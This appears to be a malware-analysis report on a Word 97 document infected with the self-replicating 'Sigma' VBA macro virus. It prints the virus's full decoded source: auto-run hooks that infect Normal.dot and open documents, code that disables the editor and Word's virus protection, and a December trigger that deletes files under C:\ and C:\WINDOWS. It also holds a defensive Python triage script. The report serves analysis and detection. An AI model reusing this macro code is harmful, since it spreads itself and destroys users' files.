Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bda3e75886d55b5a…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 2001-01-09 13:13:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 4bb8a20f300555311069446ebc024b32
SHA-1: 5ef557baa8b19f1a454eaa643bfadfbc73bdb95f
SHA-256: bda3e75886d55b5afd484828a574a25e759d12cf83fb294d24d3150c365a4c46
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Microsoft Word document carrying a VBA macro virus; the self-replicating module is installed under the name "Sigma". The auto-executing AutoOpen and AutoExec macros and the overridden built-in Word commands FileOpen, FileNew, FileSave and FileSaveAs all call clascopy, which copies the virus module into the global Normal template and into every open document, saves each of them, and deletes any other module it finds in those VBA projects, so the code both spreads to new documents and persists across Word sessions. Before replicating, clascopy calls stealth, which disables the Visual Basic editor shortcuts (Alt+F11, Alt+F8, Ctrl+Break) and toolbar, greys out the Tools menu entries for Macro, Customize and Templates and Add-Ins, switches off Word's built-in macro virus warning (Options.VirusProtection = False) and the prompt to save Normal.dot, and writes a "Puerto Princesa" comment into the document summary. The destructive payload is date-triggered: whenever the macro runs in December it calls Kill on C:\*.* and C:\WINDOWS\*.*, deleting the files in those two directories. Every routine runs under On Error Resume Next, so any failure is silent.

Heuristics (3)

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the generic rule text overstates the gap: olevba did recover a VBA project (see Extracted artifacts), and the AutoOpen, AutoExec and Word-command hooks visible in it are the stronger evidence.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4032 bytes
SHA-256: 4de58211d07bf85c5658c55dda4609ea2c933415e2309b16a54eba4a2e84f011

Extracted script (macros.bas, decoded VBA source; at most the first 1,000 lines are shown, which covers this module in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HNormal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Sigma"


Attribute VB_Name = "Sigma1"
'Copyright(c) 2000 Puerto Princesa City.
Sub AutoOpen()
    On Error Resume Next
    Call clascopy
End Sub
Sub AutoExec()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    Call clascopy
End Sub
Sub FileSave()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call clascopy
End Sub
Sub clascopy()
    On Error Resume Next
    Call stealth
    infected = False
    For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        modname = NormalTemplate.VBProject.VBComponents(A_A).Name
        If modname = "Sigma" Then infected = True
        If (modname <> "Sigma") And (modname <> "ThisDocument") Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
        End If
    Next A_A
    For Each documentopen In Documents
        Docinfected = False
        With documentopen
            For Sigmaclaw = documentopen.VBProject.VBComponents.Count To 1 Step -1
                modname = documentopen.VBProject.VBComponents(Sigmaclaw).Name
                If modname = "Sigma" Then Docinfected = True
                If (modname <> "Sigma") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then
                    Application.OrganizerDelete Source:=documentopen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
                End If
            Next Sigmaclaw
            If Docinfected = False Then
                e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines
                vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e)
                documentopen.VBProject.VBComponents.Add(1).Name = "Sigma"
                documentopen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
                ActiveDocument.Save
            End If
        End With
    Next documentopen
    If infected = False Then
        e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines
        vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
        NormalTemplate.VBProject.VBComponents.Add(1).Name = "Sigma"
        NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
        NormalTemplate.Save
    End If
End Sub
Sub stealth()
    On Error Resume Next
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyBreak, wdKeyCtrl)).Disable
    CommandBars("tools").Reset
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Enabled = False
    CommandBars("Tools").Controls("Customize...").Enabled = False
    CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    With Dialogs(wdDialogFileSummaryInfo)
        .Comments = "Puerto Princesa - the cleanest & greenest city in the PHILIPPINES"
        .Execute
    End With
    If Month(Date) = 12 Then
        Kill "C:\*.*"
        Kill "C:\WINDOWS\*.*"
    End If
End Sub
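The replication chain (AutoOpen to clascopy to NormalTemplate.Save) and the stealth routine above are exactly the behaviour a static triage pass can flag before any sandbox run. The script below is an added example written for this page; it is not the analysis platform's own heuristic engine and not oletools code. It assumes the VBA project has already been decoded to plain text (for the real sample, olevba produces macros.bas) and embeds a constructed excerpt of that source so it runs offline. It tags each regex hit with the enclosing Sub, builds the Call graph so that AutoOpen can be tied to the Kill statements in stealth, and applies a decision rule of its own; the rule ids and the verdict logic are this example's, not the report's risk score.

```python
"""Static triage of decoded Word VBA for macro-virus behaviour.

Added example for this report: not the analysis platform's heuristic engine
and not part of oletools. It assumes the VBA project is already decoded to
text (olevba does that for the real sample) and needs no Office install.
"""
import re

# Constructed excerpt: lines copied from the extracted macros.bas above; the
# other command hooks, the module loops and most of stealth() are omitted.
SAMPLE_VBA = r"""
Attribute VB_Name = "Sigma1"
Sub AutoOpen()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call clascopy
End Sub
Sub clascopy()
    On Error Resume Next
    Call stealth
    Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
    vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
    NormalTemplate.VBProject.VBComponents.Add(1).Name = "Sigma"
    NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
    NormalTemplate.Save
End Sub
Sub stealth()
    On Error Resume Next
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    Options.VirusProtection = False
    If Month(Date) = 12 Then
        Kill "C:\*.*"
        Kill "C:\WINDOWS\*.*"
    End If
End Sub
"""

SUB_HEAD = r"^(?:Private\s+|Public\s+)?Sub\s+"
# (rule id, severity, pattern), searched in each stripped line; VBA identifiers
# are case-insensitive, so every pattern is compiled with re.I.
RULES = [(rid, sev, re.compile(pat, re.I)) for rid, sev, pat in [
    ("VBA_AUTOEXEC_ENTRY", "high", SUB_HEAD + r"(?:AutoOpen|AutoExec|AutoClose|AutoNew|AutoExit|Document_Open|Document_New|Document_Close)\s*\("),
    ("VBA_WORD_COMMAND_HOOK", "medium", SUB_HEAD + r"(?:FileSave|FileSaveAs|FileOpen|FileNew|FileClose|ToolsMacro)\s*\("),
    ("VBA_SELF_REPLICATION", "high", r"VBComponents\.Add\b|CodeModule\.InsertLines\b|CodeModule\.Lines\("),
    ("VBA_MACRO_DELETE", "medium", r"\bOrganizerDelete\b"),
    ("VBA_SECURITY_DISABLE", "high", r'Options\.VirusProtection\s*=\s*False|FindKey\(.*\)\.Disable|CommandBars\("Visual Basic"\)\.Enabled\s*=\s*False'),
    ("VBA_DESTRUCTIVE_FILE_OP", "high", r'\bKill\s+"[^"]*\*'),
    ("VBA_DATE_TRIGGER", "medium", r"\b(?:Month|Day|Year|Weekday)\(Date\)\s*=\s*\d+"),
]]
SUB_DEF = re.compile(SUB_HEAD + r"(\w+)\s*\(", re.I)
END_SUB = re.compile(r"^End\s+Sub\b", re.I)
CALL_STMT = re.compile(r"^Call\s+(\w+)", re.I)  # explicit Call statements only
AUTO_ENTRIES = {"autoopen", "autoexec", "autoclose", "autonew", "autoexit", "document_open", "document_new", "document_close"}


def scan_vba(src):
    """One pass over the source, tracking the enclosing Sub of each line.
    Returns (findings, graph): rule id -> [(sub, line)] and Sub -> [callee]."""
    findings, graph, current = {}, {}, None
    for raw in src.splitlines():
        line = raw.strip()
        if m := SUB_DEF.match(line):
            current = m.group(1)
            graph[current] = []
        for rid, _sev, pat in RULES:
            if pat.search(line):
                findings.setdefault(rid, []).append((current, line))
        if current and (m := CALL_STMT.match(line)):
            graph[current].append(m.group(1))
        if END_SUB.match(line):
            current = None
    return findings, graph


def reachable(graph, start):
    """Subs transitively reachable from start via Call (compared case-insensitively, as VBA does)."""
    names = {n.lower(): n for n in graph}
    seen, stack = set(), [start]
    while stack:
        cur = names.get(stack.pop().lower())
        if cur is not None and cur not in seen:
            seen.add(cur)
            stack.extend(graph[cur])
    return seen


def verdict(findings, graph):
    """This example's own decision rule, not the report's risk scoring: code that
    writes itself into other VBA projects, reachable from an auto-run Sub, is a macro virus."""
    entries = [n for n in graph if n.lower() in AUTO_ENTRIES]
    replicating = {sub for sub, _ in findings.get("VBA_SELF_REPLICATION", [])}
    if any(replicating & reachable(graph, e) for e in entries):
        return "MALICIOUS"
    return "SUSPICIOUS" if findings else "CLEAN"


if __name__ == "__main__":
    findings, graph = scan_vba(SAMPLE_VBA)
    for rid, hits in findings.items():
        print(rid, [f"{sub}: {line[:40]}" for sub, line in hits])
    print("AutoOpen reaches", sorted(reachable(graph, "AutoOpen") - {"AutoOpen"}))
    print("verdict:", verdict(findings, graph))
```

To run it over the real artifact, replace SAMPLE_VBA with the text of macros.bas (the VBA source that olevba prints for the document). Matching on the enclosing Sub and on the Call graph is what turns isolated string hits into the chain an analyst actually reports: the Kill statements only matter because stealth is reachable from AutoOpen, and a rule that fires on "Kill" alone would flag plenty of benign clean-up macros.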